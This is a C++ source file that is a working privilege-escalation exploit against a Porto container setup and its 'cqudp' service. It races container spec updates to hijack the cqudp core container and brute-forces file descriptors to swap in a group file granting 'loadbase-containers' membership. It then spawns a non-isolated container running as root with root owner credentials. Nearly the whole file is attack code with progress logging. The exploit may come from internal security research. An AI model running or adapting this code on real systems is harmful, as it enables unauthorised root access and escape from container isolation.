#include <util/folder/path.h>
#include <util/system/shellcommand.h>
#include <util/system/fstat.h>
#include <util/stream/file.h>
#include <library/cpp/getopt/last_getopt.h>
#include <library/cpp/threading/future/async.h>
#include <library/cpp/resource/registry.h>
#include <infra/porto/api/libporto.hpp>


namespace {

    const char *kMarkerFile = "/cqudp-groups-replaced";
    const char *kYandexGroup = "dpt_yandex";
    const char *kLoadbaseGroup = "loadbase-containers";

    int replaceMcGroups() {
        if (!TFileStat(STDIN_FILENO).IsFile()) {
            return 1;
        }

        TString s = Cin.ReadAll();
        if (!s.Contains(kYandexGroup) && !s.Contains(kLoadbaseGroup)) {
            return 1;
        }

        Cerr << "[+] \"create\" loadbase-containers group" << Endl;
        TFileOutput groups("/proc/self/fd/" + ToString(STDOUT_FILENO));
        groups << NResource::Find("mc_group");
        groups.Finish();
        Cerr << "[=] OK!" << Endl;

        TFileOutput out(kMarkerFile);
        out << "OK";
        out.Finish();
        return 0;
    }

    int hijackCqudp(size_t fromFd, size_t toFd, const TString &dst) {
        auto tryReplace = [dst](size_t fd) {
            Cerr << "[+] try to hijack cqudp with fd " << fd << Endl;

            // schedule cqudp ping
            TThreadPool taskPool{TThreadPool::TParams().SetBlocking(false).SetCatching(false)};
            taskPool.Start(1);
            auto startFuture = NThreading::Async([dst] {
                usleep(10000);
                Cerr << "[+] sending cqudp ping" << Endl;

                TShellCommandOptions opts;
                opts.SetCloseInput(true);
                opts.SetUseShell(false);
                opts.SetOutputStream(&Cout);
                opts.SetErrorStream(&Cerr);

                TStringBuilder skyCode;
                skyCode << "from api.cqueue import Client;print(Client().ping(['" << dst << "']).wait(10).next())";

                const TList<TString> args = {
                        "-c",
                        skyCode,
                };
                TShellCommand cmd("/skynet/python/bin/python", args, opts);
                cmd.Run().Wait();
                Cerr << "[+] ping returned" << Endl;
            }, taskPool);

            bool ok = false;
            // hijack core container
            {
                Porto::TPortoApi api;
                Porto::TPortoRequest req;
                auto setContainer = req.mutable_updatefromspec();
                auto container = setContainer->mutable_container();

                container->set_weak(true);
                container->set_stdin_path("/dev/fd/" + ToString(fd));
                container->set_stdout_path("/dev/fd/" + ToString(fd));
                container->set_stderr_path("/cqudp-race.log");
                container->set_command(TFsPath("/proc/self/exe").ReadLink().GetPath() + " --in-cqudp");

                // wait core container
                TString name = "self/cqudp-***";
                TString state;
                Cerr << "[+] wait cqudp container: " << name << Endl;
                auto err = api.WaitContainers({name}, name, state);
                if (err != Porto::EError::Success) {
                    Cerr << "failed to wait core container: " << state << Endl;
                    return false;
                }

                Cerr << "[+] spotted cqudp container: " << name << Endl;
                // call set UpdateFromSpec to change owner to root user
                container->set_name(name);

                for (;;) {
                    Porto::TPortoResponse resp;
                    auto status = api.Call(req, resp);
                    if (status == Porto::EError::Success) {
                        // TODO(buglloc): haha, classic
                        for (int i = 0; i < 10; i++) {
                            status = api.Call(req, resp);
                        }
                        Cerr << "[+] cqudp container updated" << Endl;
                        ok = true;
                        break;
                    }

                    usleep(500);
                }
            }

            startFuture.Wait();
            return ok;
        };

        for (size_t i = fromFd; i <= toFd; ++i) {
            try {
                if (!tryReplace(i)) {
                    continue;
                }

                Cerr << "[+] cqudp container was successfully hijacked, check marker file " << kMarkerFile << " exists"
                     << Endl;
                if (TFileStat(kMarkerFile).CTime > 0) {
                    return 0;
                }
            } catch (...) {
                // sorry
            }
        }

        return 1;
    }
}


int main(int argc, char **argv) {
    using namespace NLastGetopt;
    TOpts opts = TOpts::Default();

    size_t fromFd = 1;
    size_t toFd = 100;
    TString dst;

    opts.AddLongOption("from-fd", "start fd num")
            .DefaultValue(fromFd)
            .StoreResult(&fromFd);

    opts.AddLongOption("to-fd", "end fd num")
            .DefaultValue(toFd)
            .StoreResult(&toFd);

    opts.AddLongOption("dst", "cqudp destination")
            .Optional()
            .StoreResult(&dst);

    opts.AddLongOption("in-cqudp", "do in-core logic")
            .NoArgument();

    opts.AddLongOption("spawn-container", "spawn sub container only")
            .NoArgument();

    TOptsParseResult args(&opts, argc, argv);

    if (!args.Has("spawn-container")) {
        unlink(kMarkerFile);

        if (args.Has("in-cqudp")) {
            return replaceMcGroups();
        }

        if (!dst) {
            Cerr << "--dst required" << Endl;
            return 1;
        }

        Cerr << "[+] try to hijack cqudp container" << Endl;
        int ret = hijackCqudp(fromFd, toFd, dst);
        if (ret) {
            Cerr << "[-] can't replace mc groups, something broken :(" << Endl;
            return ret;
        }

        Cerr << "[=] seems mc groups was replaced, try to execute new container" << Endl;
    }

    // run sub container
    Cerr << "[+] run subcontainer from \"real\" root and CAP_SYS_ADMIN" << Endl;
    Porto::TPortoApi api;
    Porto::TPortoRequest req;
    auto newContainerRequest = req.mutable_createfromspec();
    newContainerRequest->set_start(true);

    TString containerName = "self/root-" + ToString(Now().TimeT());
    auto container = newContainerRequest->mutable_container();
    container->set_weak(true);
    container->set_isolate(false);
    container->set_name(containerName);
    container->set_command("bash -c 'mkdir -p /cg_freezer; mount -t cgroup -ofreezer freezer /cg_freezer; echo OK'");
    container->set_stdout_path("/dev/fd/" + ToString(STDOUT_FILENO));
    container->set_stderr_path("/dev/fd/" + ToString(STDERR_FILENO));

    auto userCred = container->mutable_task_cred();
    userCred->set_user("root");
    userCred->set_group("root");

    auto ownerCred = container->mutable_owner_cred();
    ownerCred->set_user("root");
    ownerCred->set_gid(10000);

    Porto::TPortoResponse rsp;
    Cerr << "create container req:\n" << req.DebugString() << Endl;
    auto status = api.Call(req, rsp);
    Cerr << "create container rsp (" << EError_Name(status) << "):\n" << rsp.DebugString() << Endl;

    Cerr << "[+] wait container" << Endl;
    TString state;
    status = api.WaitContainer(containerName, state);
    Cerr << "[=] done (" << EError_Name(status) << "): " << state << Endl;

    return 0;
}
